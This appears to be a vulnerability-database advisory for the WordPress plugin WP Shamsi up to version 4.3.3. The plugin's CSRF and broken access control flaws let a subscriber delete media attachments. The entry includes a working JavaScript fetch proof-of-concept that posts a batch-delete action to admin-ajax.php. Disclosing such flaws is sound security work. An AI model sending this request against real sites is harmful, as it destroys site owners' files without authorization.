Lucene search

K
wpexploitLana CodesWPEX-ID:F7A20BEA-C3D5-431B-BDCF-E189C81A561A
HistoryFeb 28, 2023 - 12:00 a.m.

WP Shamsi <= 4.3.3 - Subscriber+ Attachment Deletion

2023-02-2800:00:00
Lana Codes
83
wordpress
shamsi
subscriber
attachment
deletion
exploit
ajax
security
vulnerability

0.001 Low

EPSS

Percentile

20.2%

The plugin has CSRF and broken access control vulnerabilities which leads user with role as low as subscriber delete attachment.

Exploit (#1 attachment id delete):

fetch('http://localhost/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=exopite-sof-file-batch-delete&media-ids%5B%5D=1&media-ids%5B%5D=1',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

0.001 Low

EPSS

Percentile

20.2%

Related for WPEX-ID:F7A20BEA-C3D5-431B-BDCF-E189C81A561A